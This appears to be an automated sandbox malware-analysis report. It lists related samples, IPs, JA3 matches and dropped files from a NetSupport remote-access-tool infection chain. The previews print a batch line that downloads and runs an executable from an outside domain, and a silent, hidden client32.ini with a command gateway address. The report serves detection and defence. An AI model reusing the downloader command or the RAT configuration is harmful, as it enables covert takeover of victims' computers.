                                                        2023-07-12-Gozi.dllGet hashmaliciousUrsnif, Strela StealerBrowse
                                                        • 91.199.147.95
                                                        niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.160
                                                        niqS1law5h.jsGet hashmaliciousUnknownBrowse
                                                        • 188.127.225.160
                                                        Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                        • 188.127.227.91
                                                        Chrome_update.jsGet hashmaliciousUnknownBrowse
                                                        • 188.127.227.91

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ce5f3254611a8c095a3d821d44539877Apt3bghahedghc1_browsingDocx.docxGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166
                                                        Apt3bghahedghc2_browsingDocx.docxGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166
                                                        Newcopperstealer10_browsingExe.exeGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166
                                                        Newcopperstealer10_browsingExe.exeGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166
                                                        file.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 185.9.147.166
                                                        NfE_3200vfrtytooi534eerQs0183nbnmbbmb28.msiGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166
                                                        l97Fm9s3CC.exeGet hashmaliciousAmadeyBrowse
                                                        • 185.9.147.166
                                                        Return_To_Work.docxGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166
                                                        qdIJ1BInME.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 185.9.147.166
                                                        file.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 185.9.147.166
                                                        ouq3ougHvh.exeGet hashmaliciousNymaimBrowse
                                                        • 185.9.147.166
                                                        RNbown7VnS.exeGet hashmaliciousSmokeLoaderBrowse
                                                        • 185.9.147.166
                                                        file.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 185.9.147.166
                                                        file.exeGet hashmaliciousRisePro StealerBrowse
                                                        • 185.9.147.166
                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                        • 185.9.147.166
                                                        resume.doc.bin.exeGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166
                                                        resume.doc.bin.exeGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166
                                                        DoubleHop.bin.exeGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166
                                                        DoubleHop.bin.exeGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166
                                                        inv.0886526374000.docx.docGet hashmaliciousUnknownBrowse
                                                        • 185.9.147.166

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\7z.bat

                                                        Download File
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):252
                                                        Entropy (8bit):5.249271546616028
                                                        Encrypted:false
                                                        SSDEEP:6:CxBR2N723f7fFlCe8UlLAHbKx4/mWB1N723fmvn:cn2aDfFADC0veAa+v
                                                        MD5:3EA809881FEE82EBE16060529E923AE7
                                                        SHA1:950BF57DC252692DA052CA5E1E0FF47ECF95870D
                                                        SHA-256:A5E9011D49A96CE68687917766500C9C2619C71480C2FCC380CF65DE5E8F64B3
                                                        SHA-512:5915DF17789ED48DC4F598F50C331B6E3F75100881888736D00B746F7F94271D89CDE704B06B32ABAF9B8BF5809548B0C38AE596C9BFC981BE54A7E8191855E4
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:if not exist "C:\Users\user\AppData\Local\Temp/7zz.exe" ( curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" ) .."C:\Users\user\AppData\Local\Temp/7zz.exe"..

                                                        C:\ProgramData\7zz.exe

                                                        Download File
                                                        Process:C:\Windows\System32\curl.exe
                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                        Category:modified
                                                        Size (bytes):587776
                                                        Entropy (8bit):6.439962628647099
                                                        Encrypted:false
                                                        SSDEEP:12288:myyKdVnyNhXCV4EkP7AIfzNXZ0b5NrnkcAqIV0A1caRI:mKvyNhXCV4E8BXAfrnkcAqU0A
                                                        MD5:42BADC1D2F03A8B1E4875740D3D49336
                                                        SHA1:CEE178DA1FB05F99AF7A3547093122893BD1EB46
                                                        SHA-256:C136B1467D669A725478A6110EBAAAB3CB88A3D389DFA688E06173C066B76FCF
                                                        SHA-512:6BC519A7368EE6BD8C8F69F2D634DD18799B4CA31FBC284D2580BA625F3A88B6A52D2BC17BEA0E75E63CA11C10356C47EE00C2C500294ABCB5141424FC5DC71C
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Reputation:unknown
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.rR9p..9p..9p..Bl..;p...l.. p...V..[p...xC.8p..9p...p...xA.>p...V...p..V....p..V...;p...v..8p..Rich9p..................PE..L....S.L............................L.............@.........................................................................\...P.......(...............................................................................P............................text............................... ..`.rdata..............................@..@.data............l..................@....sxdata.............................@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\CacheURL.dat

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):48
                                                        Entropy (8bit):4.448934896284057
                                                        Encrypted:false
                                                        SSDEEP:3:N8YW2TdBLESqNXLEXNCv:2YLTdB6NgXS
                                                        MD5:39F6D8FA3BD905E03B0CC8CC16707E2B
                                                        SHA1:872DCC92BFF8F52A8F6BD1905F959C991C607472
                                                        SHA-256:54B920F5B87019FCF313BEC4D9F4639A932B8268E5183B29804E91E29ED6F726
                                                        SHA-512:B9C726C0164AAB96D53795202C95591285FAAE8D882E0F0B6601189011C085349969ADF484947F0CBC64966A4A6593F483B8A32E9778E741D24519CF17D04B1E
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:https://magydostravel.com/cdn/zwmrqqgqnaww.php..

                                                        C:\ProgramData\HTCTL32.DLL

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):328056
                                                        Entropy (8bit):6.7547459359511395
                                                        Encrypted:false
                                                        SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                        MD5:C94005D2DCD2A54E40510344E0BB9435
                                                        SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                        SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                        SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                        Malicious:false
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\HTCTL32.DLL, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Reputation:unknown
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\HTML_Obj_list.txt

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):298
                                                        Entropy (8bit):4.25628025837569
                                                        Encrypted:false
                                                        SSDEEP:6:0MUIbLESrO4ywjsKVw1ASywzJHI3Sc8klIoAhHFN1zNseIR3VwWzt3YYn:0M+74+KAAObelqrU1YYn
                                                        MD5:3FA98AC589AC2B284F4D625A620D66BC
                                                        SHA1:6E473A2A0C95367A61AB98AAD4472577246E42F0
                                                        SHA-256:D9AE5DC5F2C4964C1E7BA3BE64CBA37F3043484DB9056D3A828102275D7D4101
                                                        SHA-512:FA4BB059BFB9305CBB0DA36B8AE51ACD3EBC151616FBD711494A3F60353C915BE947F24AF81145920F6F4AE234712B6F5223A630E3C1748B2D8E79A3D648BAD0
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:<script;>;</script>.. onLoad;";".. onunload;";".. onchange;";".. onsubmit;";".. onreset;";".. onselect;";".. onblur;";".. onfocus;";".. onkeydown;";".. onkeypress;";".. onkeyup;";".. onclick;";".. ondblclick;";".. onmousedown;";".. onmousemove;";".. onmouseout;";".. onmouseover;";".. onmouseup;";"

                                                        C:\ProgramData\NSM.LIC

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):258
                                                        Entropy (8bit):5.1458289587885675
                                                        Encrypted:false
                                                        SSDEEP:6:O/oPDvXk4xRPjwx3LzX81DKHMoEEjLgpW2MorGLUfKdYpPM/ioxTKa8l6i7s:X7XZR7wx3LzXBJjjqW2M23KKPM/iox7X
                                                        MD5:1B41E64C60CA9DFADEB063CD822AB089
                                                        SHA1:ABFCD51BB120A7EAE5BBD9A99624E4ABE0C9139D
                                                        SHA-256:F4E2F28169E0C88B2551B6F1D63F8BA513FEB15BEACC43A82F626B93D673F56D
                                                        SHA-512:C97E0EABEA62302A4CFEF974AC309F3498505DD055BA74133EE2462E215B3EBC5C647E11BCBAC1246B9F750B5D09240CA08A6B617A7007F2FA955F6B6DD7FEE4
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:1200..0xa353ff01....; NetSupport License File...; Generated on 14:45 - 17/07/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=HANEYMANEY..maxslaves=8888..os2=1..product=10..serial_no=NSM385736..shrink_wrap=0..transport=0..

                                                        C:\ProgramData\NSM.ini

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:Generic INItialization configuration [Features]
                                                        Category:dropped
                                                        Size (bytes):6458
                                                        Entropy (8bit):4.645519507940197
                                                        Encrypted:false
                                                        SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                        MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                        SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                        SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                        SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                        C:\ProgramData\PCICHEK.DLL

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):18808
                                                        Entropy (8bit):6.292094060787929
                                                        Encrypted:false
                                                        SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                        MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                        SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                        SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                        SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                        Malicious:false
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\PCICHEK.DLL, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Reputation:unknown
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\PCICL32.DLL

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3740024
                                                        Entropy (8bit):6.527276298837004
                                                        Encrypted:false
                                                        SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                        MD5:D3D39180E85700F72AAAE25E40C125FF
                                                        SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                        SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                        SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                        Malicious:false
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\ProgramData\PCICL32.DLL, Author: Joe Security
                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\PCICL32.DLL, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Reputation:unknown
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                                                        C:\ProgramData\PScripts\insert_delimiter.pscript

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1286
                                                        Entropy (8bit):3.2151299174173276
                                                        Encrypted:false
                                                        SSDEEP:24:QesElfxUbrVQwd8fYLAgcti3fwTONDKA2tCO4YTONQO2ONDIc4TWoV:LdxUbZ7Jc8fwTOgvv4YTOp2OCcGV
                                                        MD5:3C0C93F687DCE4D43BDB60237BBD0B54
                                                        SHA1:D66CA3BC8AD49532ECD1B22241650C24DE801BA7
                                                        SHA-256:4B460FDE39403B5FC251388363565BDCF4B3EB1FD23873154EFE61E6FC482042
                                                        SHA-512:06614A9C48B904D616AC2B60A9DF06ECA67A0EAB15A700563D98B10CB0F0461C0F978EC4289328AEAD6561226DF1391E973B8D1C1EA58822F6CF57183F525A33
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:..{.....I.n.s.e.r.t. .a. .d.e.l.i.m.i.t.e.r. .a.t. .e.v.e.r.y. .n.-.t.h. .p.o.s.i.t.i.o.n.....}.........v.a.r..... . .i.:. .i.n.t.e.g.e.r.;..... . .j.:. .i.n.t.e.g.e.r.;..... . .k.:. .i.n.t.e.g.e.r.;..... . .d.:. .s.t.r.i.n.g.;. ././. .i.n.p.u.t. .b.u.f.f.e.r..... . .s.:. .s.t.r.i.n.g.;. ././. .o.u.t.p.u.t. .b.u.f.f.e.r..... . .d.l.m.t.:. .s.t.r.i.n.g.;..... . .s.t.e.p.:. .i.n.t.e.g.e.r.;.....b.e.g.i.n..... . ..... . .s.t.e.p. .:.=. .4.;..... . .i. .:.=. .0.;. ././. .o.f.f.s.e.t..... . .d.l.m.t. .:.=. .'.%.u.'.;..... . ..... . .d. .:.=. .R.e.a.d.D.o.c.;..... . .s. .:.=. .'.'.;..... . .j. .:.=. .l.e.n.g.t.h.(.d.).;..... . .w.h.i.l.e. .i. .<. .j. .d.o..... . .b.e.g.i.n..... . . . .s. .:.=. .s. .+. .d.l.m.t.;. ././. .i.n.s.e.r.t. .d.e.l.i.m.i.t.e.r. .b.e.f.o.r.e. .d.a.t.a. .m.e.m.b.e.r..... . . . .f.o.r. .k. .:.=. .1. .t.o. .s.t.e.p. .d.o..... . . . .b.e.g.i.n..... . . . . . .i.f. .(.i. .+. .k.). .<.=. .l.e.n.g.t.h.(.d.). .t.h.e.n..... . . . . . .s. .:.=. .s. .+. .d.[.i. .+. .k.].;..... .

                                                        C:\ProgramData\PScripts\rot-13.pscript

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1274
                                                        Entropy (8bit):3.358913269584849
                                                        Encrypted:false
                                                        SSDEEP:24:Qe9J9qno9H6/oqspi7lk+ejGeIYelmpoO67SrZetYelJoO672ZeoYel0oO67SrZj:LD9wC6/VsGlk+sH6JH63H6JH6d
                                                        MD5:AC1CD856F434464D3F68465061171D0A
                                                        SHA1:57AE543F84214CF00576DB15BD24D2E1F3BD4768
                                                        SHA-256:2E4BD5557AEDD1743DA5FAB1B6995FBC447D6E9491D9EC59FA93AB889D8BCCD1
                                                        SHA-512:6348F2C1DD131231F041B5E59BB83EB7E337C93799A955DF66FB077DC3B91659263CF8780BC7A6A007008155CC2C83B0AB1AC145ABCA2A8FA7D3500AF46D1A49
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:..{.....R.O.T. .1.3.....}.....v.a.r..... . .S.t.r.L.e.n.,. .i.,. .c.h.a.r.N.u.m. .:. .W.o.r.d.;..... . .I.n.p.u.t.,. .o.u.t.p.u.t.:. .s.t.r.i.n.g.;.....b.e.g.i.n..... . .I.n.p.u.t. .:.=. .R.e.a.d.D.o.c.;..... . .O.u.t.p.u.t. .:.=. .'.'.;..... . .S.t.r.L.e.n. .:.=. .L.e.n.g.t.h.(.I.n.p.u.t.).;......... . .f.o.r. .i.:.=. .1. .t.o. .S.t.r.L.e.n. .d.o..... . .b.e.g.i.n..... . . . .i.f. .(.I.n.p.u.t.[.i.]. .>.=. .'.A.'.). .a.n.d. .(.I.n.p.u.t.[.i.]. .<.=. .'.M.'.). .t.h.e.n..... . . . . . .I.n.p.u.t.[.i.]. .:.=. .c.h.r.(.o.r.d.(.I.n.p.u.t.[.i.].). .+. .1.3.)..... . . . .e.l.s.e..... . . . .i.f. .(.I.n.p.u.t.[.i.]. .>.=. .'.N.'.). .a.n.d. .(.I.n.p.u.t.[.i.]. .<.=. .'.Z.'.). .t.h.e.n..... . . . . . .I.n.p.u.t.[.i.]. .:.=. .c.h.r.(.o.r.d.(.I.n.p.u.t.[.i.].). .-. .1.3.)..... . . . .e.l.s.e..... . . . .i.f. .(.I.n.p.u.t.[.i.]. .>.=. .'.a.'.). .a.n.d. .(.I.n.p.u.t.[.i.]. .<.=. .'.m.'.). .t.h.e.n..... . . . . . .I.n.p.u.t.[.i.]. .:.=. .c.h.r.(.o.r.d.(.I.n.p.u.t.[.i.].). .+. .1.3.)..... . . . .e.l.

                                                        C:\ProgramData\Settings.txt

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:Generic INItialization configuration [en]
                                                        Category:dropped
                                                        Size (bytes):729
                                                        Entropy (8bit):5.161224970148946
                                                        Encrypted:false
                                                        SSDEEP:12:Sx425viDEWeQrCISTiS/RQDIYm1S8Cye07xWXgeVWBmmeAFm7Vp67WpAny:SN5viDdrtSOSu0YYTNkWQaaVw7WGy
                                                        MD5:BCCC9E937D8D72A12743D75A6B396A34
                                                        SHA1:7AC820493A357F17230CDCEEF37C69BF2510AB5C
                                                        SHA-256:8CB0F6D438DB151ED507299A64031B5C957141CFC632ACE95B9135168E0FD121
                                                        SHA-512:F9A42E7CCF3DF6D99846E8B05FE21C4D5CAFDFC24F97C0EEFBAE1E27B674E637FEAAE86A52E680A12A074AE695CD2E80FC8E5588AD46063B3ADBB4A6CB9D5CE2
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:[Downloader]..UseUserAgent=1..UserAgentString=Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1) Opera 7.50 [en]..UseProxy=0..AutoRedirect=0..AutoReferrer=1..AutoParseLinks=1..UseCookies=1..SaveAsProject=1..AutoComplete=0..URLHistory=1..UseReferrer=1..ExtendedInfo=1..[Decoder]..UseHighlight=1..ReplaceEval=0..ReplaceEvalWith=evla..OverrideEval=0..AutoReplaceEval=0..[Proxy]..Address=..Port=..User=..Pass=..Hidden=1..[Monitor]..Multi=0..[Misc]..ClearClipboard=0..AutoParseLinks=1..ReplaceEval=0..ReplaceEvalWith=evla..AutoReplaceEval=0..ClearCache=1..ClearHistory=0..Language=default.lng..Highlight=1..OverrideEval=1..FontName=Tahoma..FontSize=8..[Display]..Highlight=1..FontName=MS Shell Dlg 2..FontSize=8..AutoFocusDecoder=0..

                                                        C:\ProgramData\TCCTL32.DLL

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):396664
                                                        Entropy (8bit):6.809064783360712
                                                        Encrypted:false
                                                        SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                        MD5:EAB603D12705752E3D268D86DFF74ED4
                                                        SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                        SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                        SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                        Malicious:false
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\TCCTL32.DLL, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Reputation:unknown
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\client32.exe

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):101680
                                                        Entropy (8bit):4.481468672521447
                                                        Encrypted:false
                                                        SSDEEP:384:qUjV5+6j6Qa86Fkv2Wr120hZIq6nYPL7NheMxnB1:qgVZl6FhWr80/h6EN/
                                                        MD5:F70B67C2B3204B7DDD8B755799CCCFF0
                                                        SHA1:A42E55E328D62D11E687C167BB7049D46F0F9B26
                                                        SHA-256:213AF995D4142854B81AF3CF73DEE7FFE9D8AD6E84FDA6386029101DBF3DF897
                                                        SHA-512:54FCBA8A063BFBAAE4C3A39624BF3407DB6AF5699AB8686F936AB03C5864DF7A44D089066FA2D4AEDF5AD50D6B04624966A5111BF57BEC1DDA74A571F1DD7C63
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\client32.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                        Reputation:unknown
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@.......................................@.................................< ..<....0...i...........t..0........... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\client32.ini

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):714
                                                        Entropy (8bit):5.272982980469994
                                                        Encrypted:false
                                                        SSDEEP:12:EbxS2h3q+jhGSGpBlsVTXuZ7+DP98XTKIDWss1CYublufN3Bu6a39GJ/:EbI2hFhapBlLoGXuIDvsPuGYT34t
                                                        MD5:A61475B49FEA7E08719A7E8AD1C5D278
                                                        SHA1:60591111A837C93ACF7E32096F43EA704831DA35
                                                        SHA-256:DC020C98ED1D39721AD1F127DC0C04A0735BD47C6B6ECD222683210A601D90DB
                                                        SHA-512:1CDAF447E9E591D44A1DE10453008391EE80EEF3FEC0EC8A6D354C15A9412AD87F7F33ABDF8F7C0F061F6FA70F759CDEB1352B620609B0A6F3E4AF82636D19FC
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:0xb47c726d....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=0..DisableClientConnect=0..DisableCloseApps=1..DisableDisconnect=0..DisableManageServices=1..DisableMessage=1..DisableReplayMenu=0..DisableRequestHelp=0..HideWhenIdle=1..Protocols=3..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Users\Administrator\Desktop\1\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[Bridge]..Modem=....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=94.158.247.23:5050..GSK=FH;G@ADJ9J>ICLHA=K@MED..Port=5050..SecondaryGateway=..SecondaryPort=..

                                                        C:\ProgramData\desktop.ini

                                                        Download File
                                                        Process:C:\ProgramData\7zz.exe
                                                        File Type:Windows desktop.ini
                                                        Category:dropped
                                                        Size (bytes):96
                                                        Entropy (8bit):4.862313970853504
                                                        Encrypted:false
                                                        SSDEEP:3:0NdQDjo/KKQiWDy3c5kSRE2J5oH+fqLEcTvzTXyn:0NwoCKQiWDy3IZi23oH+4TvzTXyn
                                                        MD5:B21BF903986AC0CE3B7BB2371C8502D2
                                                        SHA1:FC8C4D1630A2198A95F9739BF16F53E83BF81174
                                                        SHA-256:BB2DF21D474ED3E383FE56691DD5FE9E441F2B163A82A2D4D1042783F249B70F
                                                        SHA-512:3B0BA816CEA96FB8648A6A3CD9421EBC03065C02B4047D29834B417EF25A10DE1B5B8DDFEE5BB85761D185DDB1B36F37193CAAE0B7894B5E3850F061459DF197
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:[.ShellClassInfo]..IconResource=C:\Users\daddy\AppData\Local\Microsoft\OneDrive\OneDrive.exe,1..

                                                        C:\ProgramData\lolo.7z

                                                        Download File
                                                        Process:C:\Windows\System32\curl.exe
                                                        File Type:7-zip archive data, version 0.4
                                                        Category:modified
                                                        Size (bytes):2306944
                                                        Entropy (8bit):7.999915641276459
                                                        Encrypted:true
                                                        SSDEEP:49152:rDHf7GK0RIZLYUIFWsFYL7084J3Sr7Y1t/iAJkxNkvTMTTi0oIFJePBM5Pl:rDHfcyZ8/FW8Y9m9i5IvEP
                                                        MD5:8970FCCD38432D3A6EEFED2F274709DF
                                                        SHA1:5EEFA6D5AF3ADC5A84A5E7BA66DE87779221CC02
                                                        SHA-256:CEA3F6928121BF4382E7144B9A900CDCBECB7B7F95A14531EC0C04286A08489E
                                                        SHA-512:B647573EC25890736D94978AFB6E45C6762BA97963D91911CCD3ABF83660DA464496A4AD5AF9AFA6CAADAC76C6BE8D76B83E3DBC1987076F2560E3D7AF452B95
                                                        Malicious:false
                                                        Reputation:unknown
